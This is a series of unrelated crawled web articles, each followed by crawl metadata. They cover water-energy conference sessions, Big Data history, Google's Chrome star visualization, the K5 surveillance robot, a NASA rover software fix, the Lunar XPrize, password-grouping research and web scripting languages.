resulted in passage of three alternate methods to the state building code and a house bill which legalized the use of rainwater and graywater in Oregon. As a result of these policy changes, the team is celebrating completion of one of the largest rainwater collection projects in Oregon and is now designing what will be one of the largest rainwater-to-potable systems ever built. Miller Company Landscape Architects is an award-winning landscape architecture firm located in San Francisco. Case study projects illustrated in this presentation include over 20 green school yards the firm has designed and built in San Francisco. These projects include independent and public schools commissioned by SFUSD and SFPUC, and feature edible and native gardens, rainwater catchment systems and educational components. Rachel Young, ACEEE; M. 
Lorraine White, GEI Consulting; Joe Castro, City of Boulder; Leslie Larocque, McKinstry The first portion of the session will be a presentation of the results of a joint ACEEE/AWE Report, Tackling the Nexus: Exemplary Programs that Save Both Energy and Water, which identifies and recognizes the most successful programs that seek both energy and water savings, and chronicles these programs so that others can learn from them. The results of this research include case studies of each award-winning program and an overall synthesis and discussion of the research, including key common characteristics of the best practice programs, recommendations for successful programs, and useful lessons learned. It presents best practice ideas and lessons learned for next-generation customer energy and water efficiency programs, along with concrete examples of successful program implementation. This session will cover the water-energy nexus, the methodology of the report, the winning programs and best practice results and challenges discovered from the research. The second portion of the session will be presented by Joe Castro. Joe is one of the winning program administrators and will present on the details of his program, the City of Boulder, Colorado's Energy Performance Contracting Program, including the motivation for creating the program, program design, program performance and lessons learned. The third portion of the session will be presented by Lorraine White. Lorraine was an expert panelist and helped determine the winning programs that were included in the report described above. Lorraine will speak to the water-energy nexus in greater detail and draw on her years of work and expertise in this field. Generating electricity requires significant quantities of water, primarily for cooling. This demand can be particularly challenging at a local level, in many cases representing a community’s single largest water consumer. In addition, wastewater from these facilities can have a significant impact on water quality within a region as well. Since 2003, the California Energy Commission has evaluated new power plant proposals based on policies that encourage the use of degraded water supplies rather than fresh water by power facilities and, where feasible, the use of zero liquid discharge systems to eliminate wastewater impacts. In addition, efforts to significantly increase the efficiency of water used by power facilities have resulted in significant reductions in overall water demand by new facilities as compared to older plants. This course will explore the water dependencies and efficiency opportunities associated with power plants and the policies that now govern this relationship in California. Matthew Passmore, Rebar (moderator); Charles Brucker, PLACE Studio; Jennifer Easton, City of San Jose; Linda Wysong, PNCA From the beginning, water has been at the center of our lives. We choose to live by it, harness its energy, and certainly depend upon it for sustenance. Historically we collect our stormwater and whisk it away in the most expedient and efficient manner, never stopping to consider its ability to make additional contributions. Over the last few decades and with increasing frequency, stormwater has been treated as the important resource it is. Designers and artists, together with engineers and agencies, are looking to celebrate stormwater’s presence in our communities through creative expression, interpretation, and the visible additions of green infrastructure. 
There are inspiring examples from around the world to motivate us to join efforts with our colleagues and our communities to make an impact and to celebrate water. Water and energy are quickly becoming some of the world’s most valuable and sought-after commodities. These webcasts will feature live presentations by scientists, academics, and business leaders addressing the increasingly important issue of energy and water management. For businesses, efficiency will cut costs and promote environmental awareness, and for all, this summit will provide insight into best practices, tips, case studies, and solutions for responsible resource and facility management. Growing Enough Food Without Enough Water: Dr. David Molden, Deputy Director General for Research, International Water Management Institute (36 mins)
<urn:uuid:aafc9cb8-affb-491e-97b2-9aefe37df1f3>
CC-MAIN-2017-09
https://www.brighttalk.com/webcast/693/20597
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171629.92/warc/CC-MAIN-20170219104611-00539-ip-10-171-10-108.ec2.internal.warc.gz
en
0.934114
4,728
3.140625
3
What’s the ‘big’ deal? The past, present and future of Big Data This feature first appeared in the Spring 2015 issue of Certification Magazine. Click here to get your own print or digital copy. Big Data. It’s a buzz phrase, a marketing term, an IT framework and an employment category. That’s a heavy load for two words to carry, but Big Data is all about dealing with large burdens. The need to wrangle large datasets has been around for decades, particularly in the theoretical science and engineering communities. Why then has Big Data only recently become a major IT industry phenomenon? Put simply, Big Data couldn’t exist until the technology that made it possible became widely available and affordable to those who could benefit from it. Once that happened, it was just a matter of showing these organizations what Big Data was (and wasn’t), and how they could use it to achieve greater success. Big Data is very new, but there are already a couple of developments on the horizon that will fundamentally change what Big Data is, and who will (or won’t) be employed in its specialty. A Brief History Lesson Back in the 1960s and ’70s, very large datasets could only be processed using supercomputers — monster machines manufactured by companies like Cray Research and IBM. Supercomputers were wildly expensive to house, operate, and maintain, putting them out of the price range of most organizations. This resulted in a limited number of supercomputers in the world — with any number of government departments, corporations and universities all fighting each other to get access to processing time on the few models out there. While supercomputer price tags would become more reasonable as time passed, they remained very expensive to own and operate, keeping them out of reach for several groups that could have benefitted from their use. In 1994, a pair of NASA computer scientists figured out how to connect a group of regular PCs (often referred to as commodity hardware) so that they could perform the same massive parallel processing as a supercomputer. This was the first “Beowulf cluster,” and it was a total game changer for power computing. A Beowulf cluster consists of a local area network made up of standard PC clients, each client running a UNIX-based operating system and additional software that enables it to share processing duties with every other client in the network. This combination of inexpensive hardware and open source software made it possible to create a supercomputing system at a fraction of the cost. Traditional supercomputers would slowly drop in price as time passed. In 2008, Cray Research and Microsoft released the CX1, a “personal supercomputer” with a relatively inexpensive $25,000 price tag. The CX1 offered a very viable supercomputing option for organizations with smaller budgets. One big piece of the Big Data puzzle was the creation of Apache Hadoop in 2005. Hadoop is an open source software platform used to work with massive data sets distributed across multiple commodity servers. Hadoop works particularly well when dealing with a mix of structured and complex data. All of these developments contributed to the creation of what we now call Big Data. But how did Big Data become a successful IT industry specialty? Turning Big Data into Big Money Turning raw data into information is not a new challenge — businesses and governments have been performing this trick for decades. 
What Big Data fundamentally improved are these key elements:
● The amount of data that can be worked with
● The sophistication of the analysis that can be performed
● The accuracy of the information produced
● The cost of the required infrastructure
As noted earlier, the rush to get involved in Big Data was sparked by the technology that made it possible. In order to truly take off, however, Big Data had to be turned into a product that could be sold to large corporations and other potential clients. Big Data was given market legitimacy by industry powerhouses like IBM, SAP, Cloudera, Microsoft and Amazon Web Services. These and other vendors created the value proposition behind the Big Data buzz, turning it into a product that could be understood by potential buyers. Big Data adoption was helped greatly by the technology wave that preceded it: cloud computing. The concepts and benefits of cloud computing had already been accepted by several industries by the time that Big Data really began to gain traction. For many organizations, the addition of Big Data was a natural extension of their existing cloud computing services. Obviously, for Big Data to be beneficial, you need to have … well, big data. As it is, more data is generated and captured in today's world than at any other time in history. The mobile computing boom in particular has created a massive data collecting engine that captures multiple events from our daily lives. A smartphone creates new data points every second that it's powered on. This mobile data honeypot will grow larger from the nascent wearables market. Smartwatches, fitness bands, health monitors and other small devices that track what their owners are doing and where they are doing it are growing in popularity. The wearables market will likely see a huge boost from the recent release of the Apple Watch. Then, there is the so-called Internet of Things, also known as the Internet of Everything. As more everyday objects become internet-enabled, they will all be adding more data into the mix. All of this activity is generating a huge glut of gigabytes for Big Data specialists to spin into gold, or possibly Bitcoin. But, where have today's Big Data specialists come from? Big Data Miners The growth of Big Data has resulted in the evolution of several traditional IT industry job roles. While the job titles have changed, the Big Data job descriptions are similar to those of their more familiar counterparts, but with a few important tweaks. One new Big Data job role is that of data scientist. Now, if you were to compare a data scientist to a traditional data analyst, you would not be totally off the mark. Both roles require a deep knowledge of mathematics, statistics, computer modeling and analytics. The data scientist role, however, has some upgraded responsibilities. Data scientists are expected to have high levels of business acumen, the better to help them focus on the most strategically important questions an organization has. Data scientists must also be able to effectively communicate with business executives and department leaders, using the information they've generated to recommend specific courses of action. Some companies using Big Data have gone a step further and created a new C-level position: the Chief Analytics Officer. This business executive has responsibility for all actions taken based on the recommendations of the data scientist(s) working under them. 
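The Hadoop model mentioned earlier (spreading one job across many commodity servers) boils down to a map step and a reduce step. The following is a minimal, single-machine Python sketch of that idea, not Hadoop's actual API; the sample "shards" and function names are invented for illustration.

```python
from collections import Counter
from itertools import chain

# Hypothetical text shards standing in for blocks of a much larger dataset
# that Hadoop would distribute across many commodity servers.
shards = [
    "big data needs big storage",
    "commodity servers make big clusters cheap",
]

def map_phase(text):
    # Emit (word, 1) pairs, as a MapReduce mapper would.
    return [(word, 1) for word in text.split()]

def reduce_phase(pairs):
    # Sum the counts for each word, as a reducer would.
    totals = Counter()
    for word, count in pairs:
        totals[word] += count
    return totals

mapped = chain.from_iterable(map_phase(shard) for shard in shards)
print(reduce_phase(mapped).most_common(3))
```

In a real cluster the map calls run on the machines that hold each data block, so only the small intermediate (word, count) pairs travel over the network.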
As with other technology frameworks, Big Data requires a number of software developers and hardware experts to provide support. Hadoop developers are currently in demand on job boards. Organizations that want to host their own Big Data solution need to have hardware engineers and support technicians who are knowledgeable in Big Data clustering infrastructure. Bold predictions for Big Data Is Big Data here to stay? Yes and no. There are two significant factors that will come into play in the not-too-distant future, which will change how Big Data exists today. In the short term, Big Data is going to continue to make its presence felt in a growing number of industries. Big Data’s relatively low cost has already empowered many smaller scientific institutions around the world, who can do complex analyses of huge data sets without breaking their modest budgets. The same can be said for startups — new businesses created with limited personal or venture capital will be able to get their hands on Big Data tools for a fraction of the cost of traditional supercomputing. So, how will Big Data change in the near future? First of all, Big Data will become just Data. As a growing number of people generate greater amounts of data, and as the related technology continues to become less expensive and more accessible, the distinction between Big Data and “regular” data management systems will fade. In particular, some Big Data tools will end up as consumer-level products. We are already seeing the early stages of this in the personal health tracking industry, where a fitness band and a smartphone can automatically collect a number of vital statistics in real-time, and then perform rudimentary trend analysis on the entire data collection. A second important development is that the next wave of data scientists, will be machines. The extremely young data scientist job role is very likely already on the path to automation. Many of the duties of the data scientist — trend analysis and prediction, for example — will be performed quicker, cheaper and better by future versions of existing Big Data tools. The growing power and sophistication of computer algorithms and machine intelligence will eventually outstrip enough of the data scientist’s capabilities to make them obsolete. This isn’t to say that you shouldn’t pursue a career as a data scientist … as long as you know that it could end up with you configuring the software that is about to replace you.
<urn:uuid:83d750cc-a560-483e-8b4f-6e040db94ce6>
CC-MAIN-2017-09
http://certmag.com/whats-big-deal-past-present-future-big-data/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172447.23/warc/CC-MAIN-20170219104612-00239-ip-10-171-10-108.ec2.internal.warc.gz
en
0.958219
1,872
2.921875
3
A new Google Chrome workshop virtually reproduces 100,000 nearby stars in just one tab in your web browser. The term "nearby" in this context being relative, of course. The visualization can be accessed here, and it's a really effective gateway to procrastination. You can zoom in past Barnard's Star or Alpha Cassiopeiae on your way to the Sun. Or you can click the discreet "take a tour" icon in the top right corner of the screen for an educational presentation that begins with the Sun and then pans out, putting everything in perspective, such as the actual distance of the Voyager-1 from Earth or the proximity of other stars to the Sun. And it's all done with some eery music playing in the background, of course. Google credits Wikipedia for the star renderings and for images of the galaxy, along with several observatories. Images of the Sun were provided by NASA and several other science teams, while researchers and agencies from across the world chipped in data on the stars. Oh, and if you recognize the music, then you must have played Mass Effect; Google tapped Sam Hulick, who scored the video game, for the accompanying soundtrack, which, while perfectly ominous for the scene it accompanies, can get to be a little much for those who keep the tab open for too long while trying to write a blog post about it. As I mentioned, it's a great, almost literal escape for the middle of the workday. But for those who would nitpick the project for accuracy, Google was one step ahead with a disclaimer: Warning: Scientific accuracy is not guaranteed. Please do not use this visualization for interstellar navigation.
<urn:uuid:be7e5aeb-7a8f-43c0-9f16-2b1c84e49b98>
CC-MAIN-2017-09
http://www.networkworld.com/article/2223504/opensource-subnet/google-reproduces-100-000-stars-in-chrome-experiment.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170993.54/warc/CC-MAIN-20170219104610-00535-ip-10-171-10-108.ec2.internal.warc.gz
en
0.939937
344
2.921875
3
Robots are essentially a self-contained tribute to the wonders of technology. The most advanced models use fast computer processing, high-definition cameras, artificial intelligence and long-range sensors, all of which give you a pretty good idea where technology is heading. In some ways, a robot even provides a glimmer of the future car and future IT advances. The components for a robot are all housed on one intelligent machine that connects back to a server over a high-speed network. When deployed, a robot must be engineered to act autonomously. Any flaws in the programming lead to serious repercussions. Knightscope is a Silicon Valley startup working on the K5 surveillance robot. Intended to help police forces in urban areas, at shopping malls or the parking lot of Google, the robot is one of the best examples of how autonomous helpers can augment the efforts of human security personnel. Stacy Stephens, the co-founder of Knightscope, offers some insight into how it works and how it could be used. Robots Can Guard a Designated Area The K5 looks a bit like the Robby the Robot from Forbidden Planet fame. Both have a coned head and stand about as tall as a human. (The K5 is 5 feet tall; Robby the Robot stands 7 feet tall.) The imposing look is by design. The K5 is intended to be the most critical part of what Stephens calls the "use of force continuum" -- that is, a commanding presence. [ Analysis: Will This Robot Make America Safer? ] To stay within an area, security personnel use mapping software to create a geo-fenced perimeter. The K5 then moves autonomously (up to 3 miles per hour) and detects objects using two Light Detection and Ranging (LIDAR) sensors, which emit a laser in a 270-degree sweep every 25 milliseconds around the robot. The K5 creates a point cloud, such as a 3-D image of the surroundings showing the objects within the geo-fenced area. Unlike the GPS in your smartphone, which finds locations within a few meters from you, the K5 uses a differential GPS that finds objects within a few centimeters. That helps the robot know exactly where it's moving at all times. There's also an ultrasonic sensor for detecting objects close to the robot and a "wheel odometry" sensor to track the motion of its wheels. Robots Can Monitor the Grounds If a company deploys the K5 robot in a parking lot, one primary function is recording suspicious activity. To help, four HD video cameras can monitor and record in a 360-degree circle around the robot. Crucially, the K5 doesn't just mindlessly record activity. If there's a trigger, such as unusual or sudden movement, the K5 will record a video clip, stamp it with the GPS coordinates and alert the security guards. The K5 can scan 300 license plates per minute. In the Knightscope Security Operations Center, the security guards or the police force receive an immediate alert if the K5 detects a license for a known criminal. They can even inspect how the robots optical-character recognition system identified the plate, making sure there's a match. Since the K5 can work over a 24-hour period, infrared and thermal imaging sensors detect objects at night. The K5 isn't solely for surveillance: If someone walks up to the robot in a parking lot, he or she can press a button to talk to a human security guard. (There's no two-way video chat system, but that could be added to a future version.) 
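As a rough illustration of the geo-fencing idea described above, here is a minimal Python sketch that checks whether a GPS fix falls inside a rectangular patrol zone. The coordinates, class name and zone shape are hypothetical; Knightscope's actual mapping software is not public, and a real perimeter would typically be an arbitrary polygon rather than a rectangle.

```python
from dataclasses import dataclass

@dataclass
class GeoFence:
    """Axis-aligned rectangular patrol zone (illustrative only)."""
    min_lat: float
    max_lat: float
    min_lon: float
    max_lon: float

    def contains(self, lat: float, lon: float) -> bool:
        return (self.min_lat <= lat <= self.max_lat
                and self.min_lon <= lon <= self.max_lon)

# Hypothetical parking-lot perimeter and a GPS fix from the robot.
parking_lot = GeoFence(37.4210, 37.4225, -122.0850, -122.0835)
lat, lon = 37.4218, -122.0841

if parking_lot.contains(lat, lon):
    print("Inside patrol zone: continue patrol")
else:
    print("Outside patrol zone: stop and re-plan route")
```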
Robots Can Listen to Social Media Chatter One interesting feature on the K5 is the capability to compare real-time events detected with video cameras and motion sensors with social media chatter. Stephens says the impetus to adding this feature was the Boston Marathon bombings, when citizens took to social media to help law enforcement track the suspects. The K5 can "listen" for hashtags, keywords and other information and compare it to nearby objects and video feeds in a given area. For example, if the K5 patrols a parking lot late at night and detects a moving car, the robot can search Twitter for reports of a stolen car. The robot can even detect the license plate and then search for known criminals. The social media monitoring can be restricted to a specific location, since many Twitter posts include geo-location data. Robots Can Think on Their Own The Knightscope is a good example of how artificial intelligence is advancing. Stephens says the robot can learn over time. In a parking lot, the K5 might detect normal movements at certain times of the day, such as 5 p.m. when people leave work, and then determine that movement at 3 a.m. looks suspicious. The K5 also knows the movements of humans walking to a car or carrying packages but can detect when someone's crouching down next to a passenger door. The K5 can also listen for audio clues. Normal sounds throughout the day fall within a certain range of 80 to 90 decibels; if the sounds suddenly spike to more than 100dB, the K5 would alert security guards about a possible gunshot or explosion. Thermal imaging helps, too: The robot might learn that there was a loud sound followed by a bright glare from an explosion, or infrared cameras might detect movement in an area of a parking structure that has never shown movement before. Robots Can Protect Themselves Having a robot patrol a parking lot can deter intruders. But what if criminals try to tamper with the K5? Stephens says the robot is equipped with safety sensors to avoid collisions. If someone walks up to the robot, the K5 will initially stop and then move around that person. If the person keeps trying to confront the robot, it emits a mild warning chime and flash lights. If someone still tries to tamper with the robot, it can continue walking away and alert the security guards or police. However, if someone tries pushing the robot or removing a camera, the K5 can emit a piercing alarm to immobilize someone determined to cause damage. In most cases, by the time someone has approached the robot, the K5 has already reported the suspicious activity and alerted the police or campus security. This story, "5 Uses for the Surveillance Robot of Tomorrow" was originally published by CIO.
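To make the sound-level heuristic described in this piece concrete, here is a minimal, hypothetical Python sketch. The 80 to 90 dB "normal" range and the 100 dB alert level are the figures quoted above; everything else is invented for illustration and is far simpler than what a production system would do.

```python
ALERT_THRESHOLD_DB = 100    # spike level the article associates with a possible gunshot
NORMAL_RANGE_DB = (80, 90)  # typical daytime range cited in the article

def classify_sound(level_db: float) -> str:
    """Very simplified triage of a single sound-level reading."""
    if level_db > ALERT_THRESHOLD_DB:
        return "alert: possible gunshot or explosion"
    if level_db > NORMAL_RANGE_DB[1]:
        return "elevated: keep monitoring"
    return "normal"

for reading in (84, 88, 103):
    print(reading, "dB ->", classify_sound(reading))
```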
<urn:uuid:2ce7c2e8-3219-4b05-a251-a513ae9fc326>
CC-MAIN-2017-09
http://www.computerworld.com/article/2491135/data-center/5-uses-for-the-surveillance-robot-of-tomorrow.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174159.38/warc/CC-MAIN-20170219104614-00111-ip-10-171-10-108.ec2.internal.warc.gz
en
0.929102
1,302
3.203125
3
NASA engineers updated the software for a robotic Mars rover, correcting a computer glitch more than two months old while the robot hurtled through space on its way to Mars. Late in November, NASA launched its $2.5 billion Mars Science Laboratory. Dubbed Curiosity, the SUV-size super rover is on an eight-month journey to Mars with a mission to help scientists learn whether life can exist, or has ever existed, on the Red Planet. However, a problem caused a computer reset on the rover Nov. 29, three days after the launch, NASA reported last week. The problem was due to a cache access error in the memory management unit of the rover's computer processor, a RAD750 from BAE Systems. "Good detective work on understanding why the reset occurred has yielded a way to prevent it from occurring again," said Mars Science Laboratory Deputy Project Manager Richard Cook, in a statement. "The successful resolution of this problem was the outcome of productive teamwork by engineers at the computer manufacturer and [NASA's Jet Propulsion Laboratory]." Guy Webster, a spokesman for the JPL, told Computerworld that because of the processor glitch, the rover's ground team was unable to use the craft's star scanner, which is designed for celestial navigation. That technology was not in use for several months, and NASA engineers had to guide the rover through one major trajectory adjustment using alternate means, according to Webster. The fix, which was uploaded to the rover as it traveled through space, changed the configuration of unused data-holding locations, called registers. NASA reported that engineers confirmed this week that the fix was successful and that the star scanner is working again. Curiosity, equipped with 10 science instruments, is expected to land on Mars in August. The super rover is set to join the rover Opportunity, which has been working on Mars for more than six years. Opportunity has been working alone since a second rover, Spirit, stopped functioning last year. Curiosity will collect soil and rock samples, and analyze them for evidence that the area has, or ever had, environmental conditions favorable to microbial life. Curiosity weighs one ton and is twice as long as and five times heavier than its predecessors. Sharon Gaudin covers the Internet and Web 2.0, emerging technologies, and desktop and laptop chips for Computerworld. Follow Sharon on Twitter at @sgaudin, on Google+ or subscribe to Sharon's RSS feed . Her email address is email@example.com.
<urn:uuid:346e9134-65cd-4613-b0ac-d664659b05c2>
CC-MAIN-2017-09
http://www.computerworld.com/article/2501681/emerging-technology/nasa-fixes-computer-glitch-on-robot-traveling-to-mars.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171053.19/warc/CC-MAIN-20170219104611-00580-ip-10-171-10-108.ec2.internal.warc.gz
en
0.955154
510
2.90625
3
Meanwhile, the discussion also broke down to the benefits of functional programming versus imperative programming. Functional programming is a programming paradigm that treats computation as the evaluation of mathematical functions and avoids state and mutable data. It emphasizes the application of functions, in contrast to the imperative programming style, which emphasizes changes in state. The difference between a mathematical function and the notion of a "function" used in imperative programming is that imperative functions can have side effects, changing the value of program state. A key tenet of functional programming is the concept of immutability. In functional programming, an immutable object is an object whose state cannot be modified after it is created.
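A short sketch can make the contrast concrete. Python is not a purely functional language, but it can express both styles; the example below is illustrative only.

```python
# Imperative style: the function has a side effect (it mutates shared state).
totals = []

def add_imperative(x):
    totals.append(x)           # changes program state outside the function
    return sum(totals)

# Functional style: a pure function of its inputs, with no mutation or side effects.
def add_functional(history, x):
    return history + (x,)      # returns a *new* immutable tuple

print(add_imperative(5), totals)   # result depends on hidden, mutable state
print(add_functional((1, 2), 5))   # (1, 2, 5); the original tuple is untouched
```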
<urn:uuid:d02256a1-9729-4add-a75e-35bf676efd88>
CC-MAIN-2017-09
http://www.eweek.com/c/a/Application-Development/Is-it-Time-for-JavaScript-to-Step-Aside-for-the-Next-Big-Web-Thing-109707/1
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171670.52/warc/CC-MAIN-20170219104611-00280-ip-10-171-10-108.ec2.internal.warc.gz
en
0.947482
130
3.6875
4
There’s a team from Spain, and another from Italy. The Japanese team calls itself Hakuta, and there are numerous teams from the U.S. They’re working hard with a serious sense of competition. But they’re not getting ready for the winter Olympics in Sochi. It’s T-minus 23 months for the international assortment of scientists and their sponsors who are literally shooting for the moon in Google’s Lunar XPrize Challenge. The goal is to successfully launch an unmanned spacecraft, land it on the lunar surface and send back high-definition images, in exchange for a $30 million prize from the technology giant and its cosponsors, which include aerodynamic firm Northrup Grumman, phone giant Nokia, and chipmaker Qualcomm. The mission must be accomplished by the end of 2015 to win the grand prize. Not About The Money Many, if not all the groups will spend more than the $30 million to get off the ground, but it’s not about the money. For some, it’s a matter of national pride: only the three major superpowers, the U.S., Russia and China have so far reached the moon. Others are hoping to develop new technology and ignite new enthusiasm about space exploration, just as the U.S. Apollo missions of the 1960s and 1970s did. The last U.S. lunar landing was Apollo 17 in 1972, and the Russians landed an unmanned craft the following year. China is currently most active, with a six-wheeled robotic moon rover named Jade Rabbit roaming the lunar landscape. The Yutu rover began its mission in December, marking the first moon landing by a space probe in 37 years. Inspiring Radical Breakthroughs The XPrize Foundation’s goal, according to its Web site is to promote “radical breakthroughs for the benefit of humanity, thereby inspiring the formation of new industries and the revitalization of markets that are currently stuck due to existing failures or a commonly held belief that a solution is not possible.” In addition to the grand prize for the first lunar landing, the XPrize will award $5 million for second place as well as bonuses for reaching the Apollo 11 module landing site, surviving a lunar night, and for exploring lunar artifacts. Rules say 90 percent of the funding must come from private rather than government sources, and Google expects some teams will spend as much as $100 million to win the contest. But others are looking to reduce their costs by deploying commercial payloads on the way to the moon. Complex Engineering Task Israel’s team, SpaceIL, is cutting its costs through innovation. Rather than develop an expensive rover to accomplish the goal of traveling 500 meters (1,620 feet), its 300-pound spacecraft is being designed to land once, then fire up its rockets again to take some aerial pictures and land the required distance away. “For every pound of rover I need four pounds of propulsion to get it there,” Daniel Saar, director of business development for the Israeli team told us. Trying to find the spot where Neil Armstrong left his footprints will be almost as big a challenge as the landing, he said. “There is no GPS on the moon,” said Saat. “We have to use a NASA database of images.” The project will also draw from Israel’s defense establishment, borrowing from satellite technology deployed by Israel Aerospace Industries, a government-owned agency. Saat said that his team, which will launch from a site in the U.S. or Russia, hopes to inspire more of Israel’s young people to pursue careers in science by rising to the challenge of doing big things with limited resources. 
“Landing on the moon is a complex engineering task,” said Saat. “For a tiny budget of $36 million, we want to show the world we can explore outer space and accomplish various missions.”
<urn:uuid:85c944ea-4764-418d-a5d2-593b96eb11b6>
CC-MAIN-2017-09
http://www.cio-today.com/article/index.php?story_id=91371
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172831.37/warc/CC-MAIN-20170219104612-00632-ip-10-171-10-108.ec2.internal.warc.gz
en
0.954715
823
2.65625
3
New research shows that "123456" is a good password after all. In fact, such useless credentials from a security standpoint have an important role in an overall password management strategy, researchers at Microsoft and Carleton University, Ottawa, Canada, have found. Rather than hurt security, proper use of easy-to-remember, weak credentials encourages people to use much stronger passwords on the few critical sites and online services they visit regularly. "Many sites ask for passwords, but they require no security at all," Paul C. Van Oorschot, a Carleton professor and a co-author of the research, said. "They basically want to get the email address to contact you, but there's nothing to protect." Strong passwords would be more likely adopted if people learned to use them only on critical accounts, such as employer websites, online banking and e-commerce sites that store the user's credit card number. To be effective, this group should be small. Websites that hold no sensitive information and would not present a threat if hacked should get the throwaway credentials. However, people need to carefully select that sites that get those passwords. "Far from optimal outcomes will result if accounts are grouped arbitrarily," the research says. Following the standard advice of choosing and never reusing passwords of eight characters or more that includes uppercase and lowercase letters, numbers and special characters, is "an impossible task as portfolio size grows," the research said. Studies have shown that despite warnings, people continue to use the same weak password across websites. In 2013, the most commonly used password on the Internet was "123456," followed by "password." Therefore, rather than continue pushing a failed password strategy, the industry should adopt something that actually works, the researchers argue. "Our model yields detailed results; it indicates that any strategy that rules out weak passwords or re-use will be sub-optimal," the paper says. The researchers also argued that a password grouping strategy is more secure than a password manager, which stores passwords and their corresponding site URLs in the cloud and lets people access the information using a single master password. "If the master password is guessed or used on any malware-infected client, or the cloud store is compromised, then all credential are lost," the paper said. Indeed, researchers at the University of California, Berkeley, studied five password managers and found vulnerabilities that could be exploited to gain access to master passwords. The vendors studied included LastPass, RoboForm, My1login, PasswordBox and NeedMyPassword. Although the latest research focuses on individuals, it has implications for business. Companies are making a website or corporate network less secure if they require employees to use complex passwords that are difficult to remember and have to be changed every three months, Avivah Litan, analyst for Gartner, said. In those cases, users will counter the security measure by writing down the password or storing it in a digital address book that could get hacked. "You need to strike a balance between customer convenience and security and that balance is struck by having other measures besides passwords," Litan said. Businesses should also have technology in place that monitors login behavior and user activity to watch for anomalies that would indicate malware or hackers. This story, "Why '123456' is a Great Password" was originally published by CSO.
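As a rough illustration of the grouping strategy the researchers describe (strong, unique passwords reserved for a few critical accounts, throwaway credentials everywhere else), here is a hypothetical Python sketch. The account names and passwords are invented, the check is deliberately simplistic, and none of it is taken from the paper itself.

```python
# Hypothetical portfolio: a few critical accounts get strong, unique passwords;
# throwaway accounts deliberately share a weak, memorable one.
CRITICAL = {"bank", "employer", "primary_email"}

passwords = {
    "bank": "vN8#qTr2!LwZ",
    "employer": "p0xY$9mK&dQe",
    "primary_email": "Zr7@hB4^nScU",
    "recipe_forum": "123456",
    "news_site": "123456",
}

# Flag any critical account that reuses a password seen elsewhere.
for account in sorted(CRITICAL):
    others = {name: pw for name, pw in passwords.items() if name != account}
    if passwords[account] in others.values():
        print(f"Warning: {account} shares a password with another site")
    else:
        print(f"OK: {account} has a unique password")
```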
<urn:uuid:d4bce739-b147-474c-b005-785638d04441>
CC-MAIN-2017-09
http://www.cio.com/article/2455449/identity-access/why-123456-is-a-great-password.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501174215.11/warc/CC-MAIN-20170219104614-00156-ip-10-171-10-108.ec2.internal.warc.gz
en
0.953952
693
2.703125
3
Gone are the days when producing a Web page simply involved writing some HTML code or painting a screen using Microsoft's Frontpage Web design tool. These days, with the Internet going into e-commerce overdrive everyone wants dynamic Web experiences. Scripting has taken a quantum leap. There are two main categories of scripting language - either client or server-based. They are designed to describe attributes and functions that can be interpreted by browsers to produce a Web page. By submitting your personal information, you agree that TechTarget and its partners may contact you regarding relevant content, products and special offers. Client-side Web scripting started off with hypertext markup language (HTML), which was a static scripting language used purely to describe how a page would look. You can use HTML, for example, to position a headline, and decide which colour it will be. HTML has come a long way since it was first developed as the basis for the World Wide Web at the start of the 1990s. The World Wide Web Consortium (W3C), the industry body that ratifies some Internet standards, has released version 4.0 of the technology. VBScript was designed by Microsoft and is a scripting version of its Visual Basic programming language. The problem with the technology is that although it offers great functionality (it is also used in Microsoft Office to customise applications) it is only understood by Microsoft Internet Explorer. The row over browsers, however, combined with the proliferation of different client devices such as WAP phones, has led to a slow departure from client-side scripting in favour of server-side scripting. Processing everything on the server means that you can give everyone a similar experience of your Web site, while making allowances for different display types. One of the first scripting interfaces for the server was the common gateway interface (CGI), which enables applications to interpret scripting languages, carrying out different functions as a result. Perl is one of the most common languages used to write to CGI, although this language is hardly intuitive to use. Microsoft developed active server pages (.asp) as a means of taking inputs from a Web page (from a form, for example) and processing them so that they can interact with objects on the server. This means the input could be used to look up a database, for example. Once the processing has been completed the active server page can then take the output and render it into HTML for display in the browser. Sun Microsystems responded with Java server pages (JSP) another scripting language that differs because the scripts are compiled and loaded as servlets - small programs sitting on the Web server. Compiled programs are generally faster than interpreted ones, so JSP applications can provide performance advantages (see box above). According to documentation from software development company Rational, most of an application's business logic should not be held in a scripted page. Rather, it should be held in the business objects that the page interacts with. The server-side scripted page should essentially be the way for the browser to talk to a server-based program. One of the biggest steps when moving from a static environment to a server-side scripted environment is knowing how the scripts will interact with the middle tier, which contains all of the complicated programming logic that drives the application. 
This means that you must have a thorough understanding of the technical architecture of the application, and it also means that if the application changes, the scripting must be regression tested - tested with the new code - to make sure that it still works properly. One advantage of server-side and client-side scripts is that they are easy to implement. Rather than having to learn a complicated language like C++ or Java, you can pick up much scripting functionality in the course of a few days. But don't let the ease of implementation tempt you into undisciplined development. You still need to observe conventional procedures and safety measures when changing your code. Next week: Danny Bradbury looks at browser wars and their aftermath. Learn your lines - a guide to Web scripts. Microsoft's active server pages run with its Internet Information Server [IIS]: scripted pages sit on the Web server and provide an interpreted interface between the browser and the back-end application.
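To make the request-to-HTML flow described above concrete, here is a minimal server-side script using Python's long-standing cgi module (Perl and ASP, the technologies named in the article, follow the same pattern). This is an illustrative sketch only: the cgi module has been deprecated in recent Python releases, and the form field name is invented.

```python
#!/usr/bin/env python3
# Minimal CGI script: read a form field, do some processing, render HTML.
import cgi

form = cgi.FieldStorage()               # parses the query string or POST body
name = form.getfirst("name", "world")   # form input sent by the browser

# In a real application this is where the script would talk to the
# middle tier (a database lookup, a business object, and so on).
greeting = f"Hello, {name}!"

print("Content-Type: text/html")        # HTTP header
print()                                 # blank line ends the headers
print(f"<html><body><h1>{greeting}</h1></body></html>")
```

Deployed behind a CGI-capable web server, the script runs once per request and returns plain HTML that any browser can display, which is exactly the server-side model the article describes.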
<urn:uuid:99dbca19-0c6d-46e2-a935-06b1862bd75d>
CC-MAIN-2017-09
http://www.computerweekly.com/feature/Scripting-languages
null
